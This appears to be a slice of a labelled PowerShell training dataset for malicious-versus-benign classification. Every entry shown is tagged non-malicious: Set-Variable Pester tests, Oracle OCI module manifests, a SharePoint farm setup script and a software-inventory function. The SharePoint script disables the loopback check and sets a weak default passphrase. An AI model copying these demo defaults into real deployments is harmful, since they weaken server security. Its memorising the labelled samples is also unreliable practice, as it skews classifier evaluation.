Describe "Set-Variable DRT Unit Tests" -Tags "CI" { It "Set-Variable normal variable Name should works"{ Set-Variable foo bar $var1=Get-Variable -Name foo $var1.Name|Should -BeExactly "foo" $var1.Value|Should -BeExactly "bar" $var1.Options|Should -BeExactly "None" $var1.Description|Should -BeNullOrEmpty } It "Set-Variable normal variable Name with position should works"{ Set-Variable -Name foo bar $var1=Get-Variable -Name foo $var1.Name|Should -BeExactly "foo" $var1.Value|Should -BeExactly "bar" $var1.Options|Should -BeExactly "None" $var1.Description|Should -BeNullOrEmpty } It "Set-Variable normal variable Name with scope should works"{ Set-Variable -Name foo -Value bar0 Set-Variable -Name foo -Value bar -Scope "1" $var1=Get-Variable -Name foo -scope "1" $var1.Name|Should -BeExactly "foo" $var1.Value|Should -BeExactly "bar" $var1.Options|Should -BeExactly "None" $var1.Description|Should -BeNullOrEmpty Set-Variable -Name foo -Value newValue -Scope "local" $var1=Get-Variable -Name foo -scope "local" $var1.Name|Should -BeExactly "foo" $var1.Value|Should -BeExactly "newValue" $var1.Options|Should -BeExactly "None" $var1.Description|Should -BeNullOrEmpty Set-Variable -Name foo -Value newValue2 -Scope "script" $var1=Get-Variable -Name foo -scope "script" $var1.Name|Should -BeExactly "foo" $var1.Value|Should -BeExactly "newValue2" $var1.Options|Should -BeExactly "None" $var1.Description|Should -BeNullOrEmpty } It "Set-Variable normal variable Name with position should works"{ Set-Variable abcaVar bar Set-Variable bcdaVar anotherVal Set-Variable aVarfoo bogusval Set-Variable -Name "*aV*" -Value "overwrite" -Include "*Var*" -Exclude "bcd*" $var1=Get-Variable -Name "*aVar*" -Scope "local" $var1[0].Name|Should -BeExactly "abcaVar" $var1[0].Value|Should -BeExactly "overwrite" $var1[0].Options|Should -BeExactly "None" $var1[0].Description|Should -BeNullOrEmpty $var1[1].Name|Should -BeExactly "aVarfoo" $var1[1].Value|Should -BeExactly "overwrite" $var1[1].Options|Should -BeExactly "None" $var1[1].Description|Should -BeNullOrEmpty $var1[2].Name|Should -BeExactly "bcdaVar" $var1[2].Value|Should -BeExactly "anotherVal" $var1[2].Options|Should -BeExactly "None" $var1[2].Description|Should -BeNullOrEmpty } It "Set-Variable normal variable Name with Description and Value should works"{ Set-Variable foo bar Set-Variable -Name foo $null -Description "new description" -PassThru:$true -Scope "local" $var1=Get-Variable -Name foo -Scope "local" $var1.Name|Should -BeExactly "foo" $var1.Value|Should -BeNullOrEmpty $var1.Options|Should -BeExactly "None" $var1.Description|Should -BeExactly "new description" } It "Set-Variable normal variable Name with just Description should works"{ Set-Variable foo bar Set-Variable -Name foo -Description "new description" -PassThru:$true -Scope "local" $var1=Get-Variable -Name foo -Scope "local" $var1.Name|Should -BeExactly "foo" $var1.Value|Should -BeExactly "bar" $var1.Options|Should -BeExactly "None" $var1.Description|Should -BeExactly "new description" } It "Set-Variable overwrite Constant Option should throw SessionStateUnauthorizedAccessException"{ Set-Variable -Name abcaVar bar -Option Constant -Scope "local" { Set-Variable -Name abcaVar new -Scope 1 -ErrorAction Stop } | Should -Throw -ErrorId "VariableNotWritable,Microsoft.PowerShell.Commands.SetVariableCommand" } It "Set-Variable of existing Private variable without force should throw Exception"{ Set-Variable abcaVar bar -Description "new description" -Option Private $var1=Get-Variable -Name abcaVar $var1.Name|Should -BeExactly "abcaVar" $var1.Value|Should -BeExactly "bar" $var1.Options|Should -BeExactly "Private" $var1.Description|Should -BeExactly "new description" Set-Variable abcaVar other -Description "new description" $var1=Get-Variable -Name abcaVar $var1.Name|Should -BeExactly "abcaVar" $var1.Value|Should -BeExactly "other" $var1.Options|Should -BeExactly "Private" $var1.Description|Should -BeExactly "new description" } It "Set-Variable with Exclude, then Get-Variable it should throw ItemNotFoundException"{ Set-Variable -Name foo1,foo2 hello -Exclude foo2 -ErrorAction Stop { Get-Variable -Name foo2 -ErrorAction Stop } | Should -Throw -ErrorId "VariableNotFound,Microsoft.PowerShell.Commands.GetVariableCommand" } It "Set-Variable of existing ReadOnly variable without force should throw Exception"{ Set-Variable abcaVar bar -Description "new description" -Option ReadOnly $var1=Get-Variable -Name abcaVar $var1.Name|Should -BeExactly "abcaVar" $var1.Value|Should -BeExactly "bar" $var1.Options|Should -BeExactly "ReadOnly" $var1.Description|Should -BeExactly "new description" { Set-Variable abcaVar -Option None -Scope 1 -ErrorAction Stop } | Should -Throw -ErrorId "VariableNotWritable,Microsoft.PowerShell.Commands.SetVariableCommand" } It "Set-Variable of ReadOnly variable with private scope should work"{ Set-Variable foo bar -Description "new description" -Option ReadOnly -scope "private" $var1=Get-Variable -Name foo $var1.Name|Should -BeExactly "foo" $var1.Value|Should -BeExactly "bar" $var1.Options|Should -BeExactly "ReadOnly, Private" $var1.Description|Should -BeExactly "new description" } It "Set-Variable pipeline with Get-Variable should work"{ $footest1="bar" ${Get-Variable footest1 -valueonly|Set-Variable bootest1 -passthru} $var1=Get-Variable -Name footest1 $var1.Name|Should -BeExactly "footest1" $var1.Value|Should -BeExactly "bar" $var1.Options|Should -BeExactly "None" $var1.Description|Should -BeNullOrEmpty } } Describe "Set-Variable" -Tags "CI" { It "Should create a new variable with no parameters" { { Set-Variable testVar } | Should -Not -Throw } It "Should assign a value to a variable it has to create" { Set-Variable -Name testVar -Value 4 Get-Variable testVar -ValueOnly | Should -Be 4 } It "Should change the value of an already existing variable" { $testVar=1 $testVar | Should -Not -Be 2 Set-Variable testVar -Value 2 $testVar | Should -Be 2 } It "Should be able to be called with the set alias" { set testVar -Value 1 $testVar | Should -Be 1 } It "Should be able to be called with the sv alias" { sv testVar -Value 2 $testVar | Should -Be 2 } It "Should be able to set variable name using the Name parameter" { Set-Variable -Name testVar -Value 1 $testVar | Should -Be 1 } It "Should be able to set the value of a variable by piped input" { $testValue = "piped input" $testValue | Set-Variable -Name testVar $testVar | Should -Be $testValue } It "Should be able to pipe object properties to output using the PassThru switch" { $in = Set-Variable -Name testVar -Value "test" -Description "test description" -PassThru $output = $in | Format-List -Property Description | Out-String $output.Trim() | Should -BeExactly "Description : test description" } It "Should be able to set the value using the value switch" { Set-Variable -Name testVar -Value 4 $testVar | Should -Be 4 Set-Variable -Name testVar -Value "test" $testVar | Should -BeExactly "test" } Context "Scope Tests" { It "Should be able to set a global scope variable using the global switch" { { Set-Variable globalVar -Value 1 -Scope global -Force } | Should -Not -Throw } It "Should be able to set a global variable using the script scope switch" { { Set-Variable globalVar -Value 1 -Scope script -Force } | Should -Not -Throw } It "Should be able to set an item locally using the local switch" { { Set-Variable globalVar -Value 1 -Scope local -Force } | Should -Not -Throw } } }
combined_dataset/train/non-malicious/sample_20_68.ps1
sample_20_68.ps1
# # Module manifest for module 'OCI.PSModules.Vulnerabilityscanning' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Vulnerabilityscanning.dll' # Version number of this module. ModuleVersion = '81.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '3a30f199-7c6d-48cf-8a14-f4fa8ff17785' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Vulnerabilityscanning Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '81.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Vulnerabilityscanning.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Export-OCIVulnerabilityscanningHostAgentScanResultCsv', 'Export-OCIVulnerabilityscanningHostVulnerabilityCsv', 'Get-OCIVulnerabilityscanningContainerScanRecipe', 'Get-OCIVulnerabilityscanningContainerScanRecipesList', 'Get-OCIVulnerabilityscanningContainerScanResult', 'Get-OCIVulnerabilityscanningContainerScanResultsList', 'Get-OCIVulnerabilityscanningContainerScanTarget', 'Get-OCIVulnerabilityscanningContainerScanTargetsList', 'Get-OCIVulnerabilityscanningHostAgentScanResult', 'Get-OCIVulnerabilityscanningHostAgentScanResultsList', 'Get-OCIVulnerabilityscanningHostCisBenchmarkScanResult', 'Get-OCIVulnerabilityscanningHostCisBenchmarkScanResultsList', 'Get-OCIVulnerabilityscanningHostEndpointProtectionScanResult', 'Get-OCIVulnerabilityscanningHostEndpointProtectionScanResultsList', 'Get-OCIVulnerabilityscanningHostPortScanResult', 'Get-OCIVulnerabilityscanningHostPortScanResultsList', 'Get-OCIVulnerabilityscanningHostScanRecipe', 'Get-OCIVulnerabilityscanningHostScanRecipesList', 'Get-OCIVulnerabilityscanningHostScanTarget', 'Get-OCIVulnerabilityscanningHostScanTargetErrorsList', 'Get-OCIVulnerabilityscanningHostScanTargetsList', 'Get-OCIVulnerabilityscanningHostVulnerabilitiesList', 'Get-OCIVulnerabilityscanningHostVulnerability', 'Get-OCIVulnerabilityscanningHostVulnerabilityImpactedHostsList', 'Get-OCIVulnerabilityscanningVulnerabilitiesList', 'Get-OCIVulnerabilityscanningVulnerability', 'Get-OCIVulnerabilityscanningVulnerabilityImpactedContainersList', 'Get-OCIVulnerabilityscanningVulnerabilityImpactedHostsList', 'Get-OCIVulnerabilityscanningWorkRequest', 'Get-OCIVulnerabilityscanningWorkRequestErrorsList', 'Get-OCIVulnerabilityscanningWorkRequestLogsList', 'Get-OCIVulnerabilityscanningWorkRequestsList', 'Move-OCIVulnerabilityscanningContainerScanRecipeCompartment', 'Move-OCIVulnerabilityscanningContainerScanResultCompartment', 'Move-OCIVulnerabilityscanningContainerScanTargetCompartment', 'Move-OCIVulnerabilityscanningHostAgentScanResultCompartment', 'Move-OCIVulnerabilityscanningHostCisBenchmarkScanResultCompartment', 'Move-OCIVulnerabilityscanningHostEndpointProtectionScanResultCompartment', 'Move-OCIVulnerabilityscanningHostPortScanResultCompartment', 'Move-OCIVulnerabilityscanningHostScanRecipeCompartment', 'Move-OCIVulnerabilityscanningHostScanTargetCompartment', 'New-OCIVulnerabilityscanningContainerScanRecipe', 'New-OCIVulnerabilityscanningContainerScanTarget', 'New-OCIVulnerabilityscanningHostScanRecipe', 'New-OCIVulnerabilityscanningHostScanTarget', 'Remove-OCIVulnerabilityscanningContainerScanRecipe', 'Remove-OCIVulnerabilityscanningContainerScanResult', 'Remove-OCIVulnerabilityscanningContainerScanTarget', 'Remove-OCIVulnerabilityscanningHostAgentScanResult', 'Remove-OCIVulnerabilityscanningHostCisBenchmarkScanResult', 'Remove-OCIVulnerabilityscanningHostEndpointProtectionScanResult', 'Remove-OCIVulnerabilityscanningHostPortScanResult', 'Remove-OCIVulnerabilityscanningHostScanRecipe', 'Remove-OCIVulnerabilityscanningHostScanTarget', 'Update-OCIVulnerabilityscanningContainerScanRecipe', 'Update-OCIVulnerabilityscanningContainerScanTarget', 'Update-OCIVulnerabilityscanningHostScanRecipe', 'Update-OCIVulnerabilityscanningHostScanTarget' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Vulnerabilityscanning' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/sample_50_15.ps1
sample_50_15.ps1
# # Module manifest for module 'OCI.PSModules.Managementdashboard' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Managementdashboard.dll' # Version number of this module. ModuleVersion = '73.1.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '75973f59-c3d0-4e5a-af34-7a8a94e15cfd' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Managementdashboard Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '73.1.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Managementdashboard.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Export-OCIManagementdashboardDashboard', 'Get-OCIManagementdashboard', 'Get-OCIManagementdashboardManagementSavedSearch', 'Get-OCIManagementdashboardManagementSavedSearchesList', 'Get-OCIManagementdashboardsList', 'Import-OCIManagementdashboardDashboard', 'Move-OCIManagementdashboardManagementSavedSearchesCompartment', 'Move-OCIManagementdashboardsCompartment', 'New-OCIManagementdashboard', 'New-OCIManagementdashboardManagementSavedSearch', 'Remove-OCIManagementdashboard', 'Remove-OCIManagementdashboardManagementSavedSearch', 'Update-OCIManagementdashboard', 'Update-OCIManagementdashboardManagementSavedSearch' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Managementdashboard' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/Create SP2010 Farm V_3.ps1
Create SP2010 Farm V_3.ps1
############################################################################ ## Create-SPFarm ## V 0.3 ## Jos.Verlinde ############################################################################ Param ( [String] $Farm = "SP2010", [String] $SQLServer = $env:COMPUTERNAME, [String] $Passphrase = "pass@word1", [int] $CAPort = 26101 , [switch] $Force = $false ) # Disable the Loopback Check on stand alone demo servers. # This setting usually kicks out a 401 error when you try to navigate to sites that resolve to a loopback address e.g. 127.0.0.1 New-ItemProperty HKLM:\\System\\CurrentControlSet\\Control\\Lsa -Name "DisableLoopbackCheck" -value "1" -PropertyType dword #region Process Input Parameters $SecPhrase=ConvertTo-SecureString $Passphrase –AsPlaintext –Force $Passphrase = $null ## get Farm Account $cred_farm = $host.ui.PromptForCredential("FARM Setup", "SP Farm Account (SP_farm)", "contoso\\sp_farm", "NetBiosUserName" ) #Endregion # Create a new farm New-SPConfigurationDatabase –DatabaseName “$FARM-Config” –DatabaseServer $SQLServer –AdministrationContentDatabaseName “$FARM-Admin-Content” –Passphrase $SecPhrase –FarmCredentials $Cred_Farm # Create Central Admin New-SPCentralAdministration -Port $CAPort -WindowsAuthProvider "NTLM" #Install Help Files Install-SPApplicationContent #Secure resources Initialize-SPResourceSecurity #Install (all) features If ( $Force ) { $Features = Install-SPFeature –AllExistingFeatures -force } else { $Features = Install-SPFeature –AllExistingFeatures } ## Report features installed $Features # Provision all Services works only on stand alone servers (ie one-click-install ) # Install-SPService -Provision ## Todo : Check for Errors in the evenlog ## ## Start Central Admin Start-Process "http://$($env:COMPUTERNAME):$CAPort" ## Run Farm configuration Wizard Start-Process "http://$($env:COMPUTERNAME):$CAPort/_admin/adminconfigintro.aspx?scenarioid=adminconfig&welcomestringid=farmconfigurationwizard_welcome" ##@@ Todo - Run Farm Wizard or better yet create required service applications (minimal - normal - all template)
combined_dataset/train/non-malicious/2406.ps1
2406.ps1
function Get-InstalledSoftware { [CmdletBinding()] param ( [Parameter()] [ValidateNotNullOrEmpty()] [string]$ComputerName = $env:COMPUTERNAME, [Parameter()] [ValidateNotNullOrEmpty()] [string]$Name, [Parameter()] [ValidatePattern('\b[A-F0-9]{8}(?:-[A-F0-9]{4}){3}-[A-F0-9]{12}\b')] [string]$Guid ) process { try { $scriptBlock = { $args[0].GetEnumerator() | ForEach-Object { New-Variable -Name $_.Key -Value $_.Value } $UninstallKeys = "HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall", "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall" New-PSDrive -Name HKU -PSProvider Registry -Root Registry::HKEY_USERS | Out-Null $UninstallKeys += Get-ChildItem HKU: | where { $_.Name -match 'S-\d-\d+-(\d+-){1,14}\d+$' } | foreach { "HKU:\$($_.PSChildName)\Software\Microsoft\Windows\CurrentVersion\Uninstall" } if (-not $UninstallKeys) { Write-Warning -Message 'No software registry keys found' } else { foreach ($UninstallKey in $UninstallKeys) { $friendlyNames = @{ 'DisplayName' = 'Name' 'DisplayVersion' = 'Version' } Write-Verbose -Message "Checking uninstall key [$($UninstallKey)]" if ($Name) { $WhereBlock = { $_.GetValue('DisplayName') -like "$Name*" } } elseif ($GUID) { $WhereBlock = { $_.PsChildName -eq $Guid } } else { $WhereBlock = { $_.GetValue('DisplayName') } } $SwKeys = Get-ChildItem -Path $UninstallKey -ErrorAction SilentlyContinue | Where-Object $WhereBlock if (-not $SwKeys) { Write-Verbose -Message "No software keys in uninstall key $UninstallKey" } else { foreach ($SwKey in $SwKeys) { $output = @{ } foreach ($ValName in $SwKey.GetValueNames()) { if ($ValName -ne 'Version') { $output.InstallLocation = '' if ($ValName -eq 'InstallLocation' -and ($SwKey.GetValue($ValName)) -and (@('C:', 'C:\Windows', 'C:\Windows\System32', 'C:\Windows\SysWOW64') -notcontains $SwKey.GetValue($ValName).TrimEnd('\'))) { $output.InstallLocation = $SwKey.GetValue($ValName).TrimEnd('\') } [string]$ValData = $SwKey.GetValue($ValName) if ($friendlyNames[$ValName]) { $output[$friendlyNames[$ValName]] = $ValData.Trim() } else { $output[$ValName] = $ValData.Trim() } } } $output.GUID = '' if ($SwKey.PSChildName -match '\b[A-F0-9]{8}(?:-[A-F0-9]{4}){3}-[A-F0-9]{12}\b') { $output.GUID = $SwKey.PSChildName } New-Object –TypeName PSObject –Prop $output } } } } } if ($ComputerName -eq $env:COMPUTERNAME) { & $scriptBlock $PSBoundParameters } else { Invoke-Command -ComputerName $ComputerName -ScriptBlock $scriptBlock -ArgumentList $PSBoundParameters } } catch { Write-Error -Message "Error: $($_.Exception.Message) - Line Number: $($_.InvocationInfo.ScriptLineNumber)" } } }
combined_dataset/train/non-malicious/sample_62_3.ps1
sample_62_3.ps1
# # Module manifest for module 'OCI.PSModules.Devops' # # Generated by: Oracle Cloud Infrastructure # # @{ # Script module or binary module file associated with this manifest. RootModule = 'assemblies/OCI.PSModules.Devops.dll' # Version number of this module. ModuleVersion = '86.0.0' # Supported PSEditions CompatiblePSEditions = 'Core' # ID used to uniquely identify this module GUID = '0d3ad8c4-0bd3-4b6f-9da3-3085294e7733' # Author of this module Author = 'Oracle Cloud Infrastructure' # Company or vendor of this module CompanyName = 'Oracle Corporation' # Copyright statement for this module Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.' # Description of the functionality provided by this module Description = 'This modules provides Cmdlets for OCI Devops Service' # Minimum version of the PowerShell engine required by this module PowerShellVersion = '6.0' # Name of the PowerShell host required by this module # PowerShellHostName = '' # Minimum version of the PowerShell host required by this module # PowerShellHostVersion = '' # Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # DotNetFrameworkVersion = '' # Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only. # ClrVersion = '' # Processor architecture (None, X86, Amd64) required by this module # ProcessorArchitecture = '' # Modules that must be imported into the global environment prior to importing this module RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '86.0.0'; }) # Assemblies that must be loaded prior to importing this module RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Devops.dll' # Script files (.ps1) that are run in the caller's environment prior to importing this module. # ScriptsToProcess = @() # Type files (.ps1xml) to be loaded when importing this module # TypesToProcess = @() # Format files (.ps1xml) to be loaded when importing this module # FormatsToProcess = @() # Modules to import as nested modules of the module specified in RootModule/ModuleToProcess # NestedModules = @() # Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export. FunctionsToExport = '*' # Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export. CmdletsToExport = 'Confirm-OCIDevopsConnection', 'Get-OCIDevopsAuthorsList', 'Get-OCIDevopsBuildPipeline', 'Get-OCIDevopsBuildPipelinesList', 'Get-OCIDevopsBuildPipelineStage', 'Get-OCIDevopsBuildPipelineStagesList', 'Get-OCIDevopsBuildRun', 'Get-OCIDevopsBuildRunsList', 'Get-OCIDevopsCommit', 'Get-OCIDevopsCommitDiff', 'Get-OCIDevopsCommitDiffsList', 'Get-OCIDevopsCommitsList', 'Get-OCIDevopsConnection', 'Get-OCIDevopsConnectionsList', 'Get-OCIDevopsDeployArtifact', 'Get-OCIDevopsDeployArtifactsList', 'Get-OCIDevopsDeployEnvironment', 'Get-OCIDevopsDeployEnvironmentsList', 'Get-OCIDevopsDeployment', 'Get-OCIDevopsDeploymentsList', 'Get-OCIDevopsDeployPipeline', 'Get-OCIDevopsDeployPipelinesList', 'Get-OCIDevopsDeployStage', 'Get-OCIDevopsDeployStagesList', 'Get-OCIDevopsFileDiff', 'Get-OCIDevopsMirrorRecord', 'Get-OCIDevopsMirrorRecordsList', 'Get-OCIDevopsObject', 'Get-OCIDevopsObjectContent', 'Get-OCIDevopsPathsList', 'Get-OCIDevopsProject', 'Get-OCIDevopsProjectsList', 'Get-OCIDevopsRef', 'Get-OCIDevopsRefsList', 'Get-OCIDevopsRepoFileDiff', 'Get-OCIDevopsRepoFileLines', 'Get-OCIDevopsRepositoriesList', 'Get-OCIDevopsRepository', 'Get-OCIDevopsRepositoryArchiveContent', 'Get-OCIDevopsRepositoryFileLines', 'Get-OCIDevopsTrigger', 'Get-OCIDevopsTriggersList', 'Get-OCIDevopsWorkRequest', 'Get-OCIDevopsWorkRequestErrorsList', 'Get-OCIDevopsWorkRequestLogsList', 'Get-OCIDevopsWorkRequestsList', 'Invoke-OCIDevopsApproveDeployment', 'Invoke-OCIDevopsMirrorRepository', 'Invoke-OCIDevopsScheduleCascadingProjectDeletion', 'Move-OCIDevopsProjectCompartment', 'New-OCIDevopsBuildPipeline', 'New-OCIDevopsBuildPipelineStage', 'New-OCIDevopsBuildRun', 'New-OCIDevopsConnection', 'New-OCIDevopsDeployArtifact', 'New-OCIDevopsDeployEnvironment', 'New-OCIDevopsDeployment', 'New-OCIDevopsDeployPipeline', 'New-OCIDevopsDeployStage', 'New-OCIDevopsProject', 'New-OCIDevopsRepository', 'New-OCIDevopsTrigger', 'Remove-OCIDevopsBuildPipeline', 'Remove-OCIDevopsBuildPipelineStage', 'Remove-OCIDevopsConnection', 'Remove-OCIDevopsDeployArtifact', 'Remove-OCIDevopsDeployEnvironment', 'Remove-OCIDevopsDeployPipeline', 'Remove-OCIDevopsDeployStage', 'Remove-OCIDevopsProject', 'Remove-OCIDevopsRef', 'Remove-OCIDevopsRepository', 'Remove-OCIDevopsTrigger', 'Stop-OCIDevopsBuildRun', 'Stop-OCIDevopsDeployment', 'Stop-OCIDevopsScheduledCascadingProjectDeletion', 'Update-OCIDevopsBuildPipeline', 'Update-OCIDevopsBuildPipelineStage', 'Update-OCIDevopsBuildRun', 'Update-OCIDevopsConnection', 'Update-OCIDevopsDeployArtifact', 'Update-OCIDevopsDeployEnvironment', 'Update-OCIDevopsDeployment', 'Update-OCIDevopsDeployPipeline', 'Update-OCIDevopsDeployStage', 'Update-OCIDevopsProject', 'Update-OCIDevopsRepository', 'Update-OCIDevopsTrigger', 'Write-OCIDevopsRepositoryRef' # Variables to export from this module VariablesToExport = '*' # Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export. AliasesToExport = '*' # DSC resources to export from this module # DscResourcesToExport = @() # List of all modules packaged with this module # ModuleList = @() # List of all files packaged with this module # FileList = @() # Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell. PrivateData = @{ PSData = @{ # Tags applied to this module. These help with module discovery in online galleries. Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Devops' # A URL to the license for this module. LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt' # A URL to the main website for this project. ProjectUri = 'https://github.com/oracle/oci-powershell-modules/' # A URL to an icon representing this module. IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png' # ReleaseNotes of this module ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md' # Prerelease string of this module # Prerelease = '' # Flag to indicate whether the module requires explicit user acceptance for install/update/save # RequireLicenseAcceptance = $false # External dependent modules of this module # ExternalModuleDependencies = @() } # End of PSData hashtable } # End of PrivateData hashtable # HelpInfo URI of this module # HelpInfoURI = '' # Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix. # DefaultCommandPrefix = '' }
combined_dataset/train/non-malicious/check-nsca.ps1
check-nsca.ps1
